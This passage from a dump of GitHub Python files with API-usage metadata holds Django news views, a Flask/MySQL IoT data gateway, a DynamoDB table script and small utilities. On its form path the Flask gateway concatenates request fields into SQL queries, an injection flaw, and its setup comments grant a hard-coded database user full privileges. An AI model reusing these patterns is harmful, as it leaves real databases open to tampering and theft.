"line_number": 143, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 143, "usage_type": "name"}, {"api_name": "excel_generator.Style.Style", "line_number": 145, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 145, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 145, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 148, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 150, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 153, "usage_type": "call"}, {"api_name": "Tools.divide_column", "line_number": 156, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 158, "usage_type": "call"}, {"api_name": "Tools.divide_column", "line_number": 161, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 163, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 166, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 169, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 172, "usage_type": "call"}, 
{"api_name": "Tools.coordinate_transfer", "line_number": 175, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 178, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 183, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 184, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 185, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 186, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 187, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 188, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 189, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 192, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 196, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 222, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 223, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 223, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 229, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 230, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 230, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 230, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 230, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 230, "usage_type": "name"}, {"api_name": "Tools.coordinate_transfer", "line_number": 231, "usage_type": "call"}, {"api_name": "Tools.coordinate_transfer", "line_number": 232, "usage_type": "call"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 236, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 237, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 237, "usage_type": "name"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 241, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 242, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 247, 
"usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 248, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 248, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 252, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 253, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 253, "usage_type": "name"}, {"api_name": "excel_generator.Cube.Cube", "line_number": 257, "usage_type": "call"}, {"api_name": "excel_generator.Style.Style", "line_number": 258, "usage_type": "call"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 258, "usage_type": "name"}, {"api_name": "excel_generator.Common.border_pattern", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.side_style", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.fill_pattern", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.bg_color", "line_number": 262, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_pattern", "line_number": 263, "usage_type": "name"}, {"api_name": "excel_generator.Common.font_style", "line_number": 263, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment_pattern", "line_number": 263, "usage_type": "name"}, {"api_name": "excel_generator.Common.alignment", "line_number": 263, "usage_type": "name"}, {"api_name": "openpyxl.Workbook", "line_number": 278, "usage_type": "call"}, {"api_name": "excel_generator.tool.RenderCore.RenderCore", "line_number": 280, "usage_type": "call"}, {"api_name": "excel_generator.mock.SGM.page2", "line_number": 281, "usage_type": "argument"}, {"api_name": "template.HeaderTemplate.common_header_sgm_1", "line_number": 281, "usage_type": "name"}]} +{"seq_id": "41493880983", "text": "from django.shortcuts import render,get_object_or_404,redirect\nfrom .models import NewsType,NewsTopic,posts\nfrom .forms import NewNewsForm,CommentForm\nfrom django.views.generic import UpdateView,ListView\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Count\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nimport datetime as dt\n# Create your views here.\ndef News(request,news_id):\n news = get_object_or_404(NewsType, pk=news_id)\n #عمل عمود وهمي في الجدول عن طريق annotate\n #coulmn name= comments\n #queryset = news.topics.order_by('-created_dt').annotate(comments=Count('posts'))\n #queryset = NewsTopic.objects.filter(type__type = news).order_by('-description')\n queryset = NewsTopic.objects.filter(type__type = 
news)\n    page = request.GET.get('page', 1)\n    paginator = Paginator(queryset, 20)\n    try:\n        topics = paginator.page(page)\n    except PageNotAnInteger:\n        topics = paginator.page(1)\n    except EmptyPage:\n        topics = paginator.page(paginator.num_pages)\n    return render(request,'news/news.html',{'n':news,'topics':topics})\n# or, in the GCBV style\n#class NewsListView(ListView):\n   # model= NewsType\n   # context_object_name = 'n'\n   # page_kwarg = 'news_id'\n    #template_name='news/news.html'\n@login_required\ndef NewNews(request,news_id):\n    news = get_object_or_404(NewsType, pk=news_id)\n    if (request.method == \"POST\"):\n        form = NewNewsForm(request.POST)\n        if form.is_valid():\n            topic = form.save(commit=False)\n            # to save the user who created the news:\n            #created_by= request.user\n            topic.type= news\n            topic.save()\n\n            return redirect('news_page', news_id=news.pk)\n    else:\n        form = NewNewsForm()\n    return render(request, 'news/new_news.html', {'form': form})\n\ndef topic_posts(request,news_id,topic_id):\n    topic = get_object_or_404(NewsTopic,type__id=news_id,pk=topic_id)\n    return render(request,'news/topic_posts.html',{'topic':topic})\ndef comment(request,news_id,topic_id):\n    topic = get_object_or_404(NewsTopic,type__id=news_id,pk=topic_id)\n    if (request.method == \"POST\"):\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            post = form.save(commit=False)\n            # to save the user who created the post:\n            post.created_by= request.user\n            post.topic = topic\n            post.save()\n            return redirect('topic_posts', news_id=topic.type.pk,topic_id=topic.pk)\n    else:\n        form = CommentForm()\n    return render(request,'news/comment.html',{'topic':topic,'form':form})\n# another way to write a view\n# this approach is called GCBV (generic class-based views)\n# it relies on a ready-made class that is given a few attributes and a method\nclass PostUpdateView(UpdateView):\n    model = posts\n    fields = ('message',)\n    template_name = 'news/edit_post.html'\n    pk_url_kwarg = 'post_id'\n    context_object_name = 'post'\n    def form_valid(self, form):\n        post=form.save(commit=False)\n        post.updated_date = timezone.now()\n        post.save()\n        return redirect('topic_posts',news_id=post.topic.type.pk,topic_id=post.topic.pk)\n", "repo_name": "ahedmafarjeh/cars_news_django_d_project", "sub_path": "news/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 12, "usage_type": "call"}, {"api_name": "models.NewsType", "line_number": 12, "usage_type": "argument"}, {"api_name": "models.NewsTopic.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "models.NewsTopic.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.NewsTopic", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 19, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 22, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "models.NewsType", "line_number": 35, "usage_type": "argument"}, {"api_name": "forms.NewNewsForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 45, "usage_type": "call"}, {"api_name": "forms.NewNewsForm", 
"line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 33, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 51, "usage_type": "call"}, {"api_name": "models.NewsTopic", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 54, "usage_type": "call"}, {"api_name": "models.NewsTopic", "line_number": 54, "usage_type": "argument"}, {"api_name": "forms.CommentForm", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "forms.CommentForm", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.views.generic.UpdateView", "line_number": 70, "usage_type": "name"}, {"api_name": "models.posts", "line_number": 71, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 78, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 78, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "7721565954", "text": "from django.conf.urls import url\r\n# -----------------------------------------\r\nfrom management import views\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index),\r\n url(r'^demo/$', views.demo),\r\n url(r'^addserverfun/$', views.addserverfun),\r\n #url(r'^addapp/$', views.addapp),\r\n #url(r'^addhost/$', views.addhost),\r\n #url(r'^addmodule/$', views.addmodule),\r\n]", "repo_name": "harrydengchao/OManager", "sub_path": "management/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "management.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "management.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "management.views.demo", "line_number": 7, "usage_type": "attribute"}, {"api_name": "management.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "management.views.addserverfun", "line_number": 8, "usage_type": "attribute"}, {"api_name": "management.views", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "40463387783", "text": "from pyproj import Proj, transform\nimport h5py\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\") #Performance warning from pytables\nimport sys\nsys.setrecursionlimit(10000)\nfrom make_met_forcing import ERA5_utils, track_class\nimport psutil\nimport time\n\ndef create_met_forcing(config,\n track_no,\n stop_date):\n\n track = get(config.year, track_no, config.tracks_dir)\n\n my_track = track_class.track(track,\n config.year,\n stop_date,\n config.aux_data_dir)\n\n my_track.track_no = track_no\n\n if my_track.valid_data:\n\n rean = ERA5_utils.add_reanalysis_to_track(my_track,\n config)\n\n full = ERA5_utils.add_derived_vars_to_track(rean)\n\n my_track.met_forcing = full\n\n initial_coords = 
xy_to_lonlat(my_track.info['start_coords'][0],\n my_track.info['start_coords'][1])\n\n start_date = my_track.info['start_date']\n\n my_track.metadata = (np.round(initial_coords, decimals=1), start_date)\n\n return(my_track)\n\ndef get(year,\n track_no,\n track_dir):\n\n track_file_name = f'{track_dir}tracks_{year}.h5'\n\n with h5py.File(track_file_name, 'r') as f:\n\n track = f[f't{track_no}'].value\n\n\n return (track)\n\ndef xy_to_lonlat(x, y):\n EASE_Proj = Proj(init='epsg:3408')\n WGS_Proj = Proj(init='epsg:4326')\n lon, lat = transform(EASE_Proj, WGS_Proj, x, y)\n return (lon, lat)\n\ndef lonlat_to_xy(lon, lat):\n EASE_Proj = Proj(init='epsg:3408')\n WGS_Proj = Proj(init='epsg:4326')\n x, y = transform(WGS_Proj, EASE_Proj, lon, lat)\n return (x, y)\n\ndef dangerous_temp():\n temps = psutil.sensors_temperatures()['coretemp']\n too_hot = False\n for i in temps:\n if i[1] > 70:\n too_hot = True\n\n return(too_hot)", "repo_name": "robbiemallett/SP_LG", "sub_path": "SP_LG/make_met_forcing/track_utils.py", "file_name": "track_utils.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.setrecursionlimit", "line_number": 7, "usage_type": "call"}, {"api_name": "make_met_forcing.track_class.track", "line_number": 18, "usage_type": "call"}, {"api_name": "make_met_forcing.track_class", "line_number": 18, "usage_type": "name"}, {"api_name": "make_met_forcing.ERA5_utils.add_reanalysis_to_track", "line_number": 27, "usage_type": "call"}, {"api_name": "make_met_forcing.ERA5_utils", "line_number": 27, "usage_type": "name"}, {"api_name": "make_met_forcing.ERA5_utils.add_derived_vars_to_track", "line_number": 30, "usage_type": "call"}, {"api_name": "make_met_forcing.ERA5_utils", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 39, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 49, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 57, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 58, "usage_type": "call"}, {"api_name": "pyproj.transform", "line_number": 59, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 63, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 64, "usage_type": "call"}, {"api_name": "pyproj.transform", "line_number": 65, "usage_type": "call"}, {"api_name": "psutil.sensors_temperatures", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "69793671234", "text": "import csv\nimport datetime\n\nclass_code_names = []\nclass_names = []\ndays = []\nstart_times = []\ndurations = []\nteaching_weeks = []\nlocations = []\nstaffs = []\n\nunavailable_times = []\n\nwith open('test.csv', encoding='utf-8-sig') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if len(row) > 2:\n class_code_names.append(row[0])\n class_names.append(row[1])\n days.append(row[3])\n start_times.append(row[4])\n durations.append(row[5])\n teaching_weeks.append(row[6])\n locations.append(row[7])\n staffs.append(row[8])\n\n\ndef day_to_iso_day(day):\n if day == \"Monday\":\n return 1\n elif day == \"Tuesday\":\n return 2\n elif day == \"Wednesday\":\n return 3\n elif day == \"Thursday\":\n return 4\n elif day == \"Friday\":\n return 5\n elif day == \"Saturday\":\n return 6\n elif day == \"Sunday\":\n return 7\n\n\ndef get_start_end_dates(day, start_time, 
teaching_week):\n\n periods = teaching_week.split(',')\n periods_formatted = []\n periods_calculated = []\n start_time = datetime.datetime.strptime(start_time, \"%I:%M%p\")\n\n for word in periods:\n period_formatted = word.replace(\" \", \"\").split('to')\n for i in range(len(period_formatted)):\n period_formatted[i] = datetime.datetime.strptime(period_formatted[i], \"%d/%m/%y\")\n period_formatted[i] += datetime.timedelta(hours=start_time.hour, minutes=start_time.minute)\n periods_formatted.append(period_formatted)\n\n add_initial_days = 0\n day = day_to_iso_day(day) # Monday - 1, Sunday - 7\n for period in periods_formatted:\n if len(period) == 2:\n if (datetime.datetime.isoweekday(period[0])) != day:\n add_initial_days = 7 - day\n period[0] += datetime.timedelta(days=add_initial_days)\n periods_calculated.append(period[0].isoformat())\n\n while period[0] <= period[1]:\n periods_calculated.append(period[0].isoformat())\n period[0] += datetime.timedelta(days=7)\n else:\n periods_calculated.append(period[0].isoformat())\n\n return periods_calculated\n\n\nfor i in range(1, len(class_code_names)):\n print(get_start_end_dates(days[i], start_times[i], teaching_weeks[i]))\n\n\n\n", "repo_name": "JasonLyy/monash-timetable-parser", "sub_path": "parse.py", "file_name": "parse.py", "file_ext": "py", "file_size_in_byte": 2365, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime.isoweekday", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "23524842517", "text": "#TODO Drop Table instead of database to avoid giving all previlages to gnostis\r\n\r\nfrom flask import Flask,request, render_template\r\nimport mysql.connector \r\nfrom datetime import datetime, timedelta\r\nimport pytz\r\nimport webbrowser\r\n\r\n#pip3 install mysql-connector-python==8.0.29\r\n#pip3 install DateTime\r\n#pip3 install flask\r\n#pip3 install pytz\r\n\r\n#sudo apt install mariadb-server\r\n#sudo mysql_secure_installation\r\n#set password and answer yes to all\r\n#Then run mysql -u root -p\r\n#and login\r\n#then give permissions to gnostis\r\n#CREATE USER 'gnostis'@'localhost' IDENTIFIED BY 'gnostis'; \r\n#GRANT ALL PRIVILEGES ON *.* TO 'gnostis'@'localhost' WITH GRANT OPTION; \r\n\r\napp = Flask(__name__)\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"gnostis\",\r\n password=\"gnostis\"\r\n )\r\n\r\nmycursor = mydb.cursor()\r\nmycursor.execute(\"DROP DATABASE IF EXISTS microlabIoT\")\r\nmycursor.execute(\"CREATE SCHEMA IF NOT EXISTS microlabIoT DEFAULT CHARACTER SET utf8\")\r\nmycursor.execute(\"USE microlabIoT\")\r\nmycursor.execute(\"CREATE DATABASE IF NOT EXISTS microlabIoT\")\r\n#mycursor.execute(\"CREATE TABLE IF NOT EXISTS teams (team VARCHAR(255), temperature VARCHAR(255), pressure 
VARCHAR(255), status VARCHAR(255))\")\r\nmycursor.execute(\"CREATE TABLE IF NOT EXISTS teams (team VARCHAR(255), temperature VARCHAR(255), pressure VARCHAR(255), status VARCHAR(255), timestamp DATETIME, PRIMARY KEY (team))\")\r\n#timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n#timeNow = timeNow.strftime('%Y-%m-%d %H:%M:%S')\r\n#mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status,timestamp) VALUES (%s, %s, %s, %s, %s)\", ('1', '20C','10%','help',timeNow))\r\n#mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status) VALUES ('2', '25C','20%','OK')\")\r\n#mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status) VALUES ('3', '30C','30%','OK')\")\r\n\r\n@app.route('/')\r\ndef home():\r\n try:\r\n mycursor = mydb.cursor()\r\n #mycursor.execute(\"SELECT * FROM teams\")\r\n timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n time30MinutesAgo=timeNow-timedelta(minutes=30)\r\n time30MinutesAgo = time30MinutesAgo.strftime('%Y-%m-%d %H:%M:%S')\r\n mycursor.execute(\"SELECT * FROM teams WHERE timestamp >='\"+time30MinutesAgo+\"'\")\r\n myresult = mycursor.fetchall()\r\n\r\n #for x in myresult:\r\n # print(x)\r\n\r\n #print (myresult[0])\r\n \r\n return render_template('home.html',data=myresult)\r\n except:\r\n print(\"MY SQL IS BUSY\")\r\n return (\"\")\r\n \r\n\r\n@app.route('/data', methods = ['GET', 'POST', 'DELETE'])\r\ndef data():\r\n #mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status) VALUES ('4', '20C','10%','help')\")\r\n if request.method == 'GET':\r\n \"\"\"return the information for \"\"\"\r\n #print(\"GET\")\r\n return(200)\r\n if request.method == 'POST':\r\n if request.headers.get('Content-Type'):\r\n #print(request.headers['Content-Type'])\r\n try:\r\n data=request.get_json()\r\n except:\r\n return('400 corrupted json')\r\n #for x in data:\r\n #print(str(x).replace(\"'\",'\\\"'))\r\n #datadict=json.loads(str(data).replace(\"'\",'\\\"'))\r\n datadict={\r\n \"temperature\":\"None\",\r\n \"pressure\":\"None\",\r\n \"team\":\"None\",\r\n \"status\":\"None\"\r\n }\r\n for object in data:\r\n #print(object)\r\n try:\r\n #if object[\"name\"]==\"team\" and object[\"value\"]==\"3\":\r\n # object[\"value\"]=u'\\xfb9'\r\n #object[\"name\"].encode('utf-8')\r\n #object[\"value\"].encode('utf-8')\r\n if(object[\"name\"].replace(\".\",\"\").isalnum() == False):\r\n print(\"name problem\")\r\n return('400 Invalid chars in json')\r\n if(object[\"value\"].replace(\".\",\"\").isalnum() ==False):\r\n print(\"value problem\")\r\n return('400 Invalid chars in json')\r\n datadict[object[\"name\"]]=object[\"value\"]\r\n except:\r\n print(object[\"name\"])\r\n print(object[\"value\"])\r\n return('400 Invalid chars in json')\r\n if datadict['team']==\"None\" or datadict['team']==\"\":\r\n print(\"Invalid team selected\")\r\n return('400 Invalid team')\r\n #print(datadict)\r\n mycursor.execute(\"SELECT * FROM teams WHERE team='\"+str(datadict['team'])+\"'\")\r\n exists=mycursor.fetchall()\r\n timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n timeNow = timeNow.strftime('%Y-%m-%d %H:%M:%S')\r\n if (exists==[]):\r\n mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status,timestamp) VALUES (%s, %s, %s, %s, %s)\",(str(datadict['team']), str(datadict['temperature']),str(datadict['pressure']),str(datadict['status']),timeNow))\r\n else:\r\n mycursor.execute(\"UPDATE teams SET temperature=%s,pressure=%s,status=%s,timestamp=%s WHERE 
team=%s\",(str(datadict['temperature']),str(datadict['pressure']),str(datadict['status']),timeNow,str(datadict['team'])))\r\n\r\n return('200 OK')\r\n else:\r\n data= request.form\r\n #check if team exists\r\n mycursor.execute(\"SELECT * FROM teams WHERE team='\"+str(data.get('team'))+\"'\")\r\n exists=mycursor.fetchall()\r\n timeNow = datetime.now(pytz.timezone('Europe/Athens'))\r\n timeNow = timeNow.strftime('%Y-%m-%d %H:%M:%S')\r\n if (exists==[]):\r\n mycursor.execute(\"INSERT INTO teams (team, temperature,pressure,status,timestamp) VALUES (%s, %s, %s, %s, %s)\",(str(data.get('team')), str(data.get('temperature')),str(data.get('pressure')),str(data.get('status')),timeNow))\r\n else:\r\n mycursor.execute(\"UPDATE teams SET temperature=%s,pressure=%s,status=%s,timestamp=%s WHERE team=%s\",(str(data.get('temperature')),str(data.get('pressure')),str(data.get('status')),timeNow,str(data.get('team'))))\r\n \r\n print(\"Received Data:\")\r\n print(data)\r\n print(\"End of Data\")\r\n return('200 OK')\r\n else:\r\n # POST Error 405 Method Not Allowed\r\n print(\"405 Method Not Allowed\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #app.run(host='0.0.0.0',debug=False)\r\n webbrowser.open('http://localhost:5000') \r\n app.run(debug=False)", "repo_name": "mvaki/GatewayForMicrolabIoT", "sub_path": "microlabIoT.py", "file_name": "microlabIoT.py", "file_ext": "py", "file_size_in_byte": 6667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 23, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.headers.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 113, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 122, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 122, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 126, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 126, "usage_type": 
"call"}, {"api_name": "webbrowser.open", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "41167395682", "text": " # Creation of Table in DynamoDB\r\n\r\n # a SDK package for aws in python\r\nimport boto3 \r\n\r\n# user should go on with below line of code if they have'nt configured through AWS previously (Note)\r\n# client = boto3.client('dynamodb',aws_access_key_id='yyyy', aws_secret_access_key='xxxx', region_name='***') \r\n\r\n# aws service resource and region are set.\r\n\r\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1') \r\nname=input(\"Enter name of the table :\\t\")\r\n\r\n# Creation of table\r\n\r\ntable = dynamodb.create_table( \r\n TableName=movies,\r\n KeySchema=[\r\n {\r\n \r\n # here Attribute 'year' is a partition key and it is of type hash which is derived using hash function\r\n \r\n 'AttributeName': 'year',\r\n 'KeyType': 'HASH' #Partition key \r\n \r\n },\r\n {\r\n \r\n # here Attribute 'title' is a sort key and it is of type Range\r\n \r\n 'AttributeName': 'title', \r\n 'KeyType': 'RANGE' #Sort key\r\n }\r\n ],\r\n AttributeDefinitions=[ \r\n {\r\n \r\n \r\n # N represents the datatype of attribute 'year' should be a number\r\n \r\n 'AttributeName': 'year', \r\n 'AttributeType': 'N'\r\n },\r\n {\r\n # S represents the datatype of attribute 'title' should be a string\r\n \r\n 'AttributeName': 'title', \r\n 'AttributeType': 'S'\r\n },\r\n\r\n ],\r\n # throughput parameters\r\n ProvisionedThroughput={\r\n 'ReadCapacityUnits': 10, \r\n 'WriteCapacityUnits': 10\r\n }\r\n \r\n)\r\n\r\nprint(\"Table status:\", table.table_status)", "repo_name": "NitinCR/dyanomodb", "sub_path": "createtable.py", "file_name": "createtable.py", "file_ext": "py", "file_size_in_byte": 2016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "boto3.resource", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "38727993457", "text": "import torch\nfrom torch.nn import Module\nfrom torch.nn.functional import softplus\n\n\nclass BoxEmbedding:\n def __init__(self, volume_temp: float = 1.0, threshold: float = 20):\n super().__init__()\n self.volume_temp = volume_temp\n self.threshold = threshold\n\n def 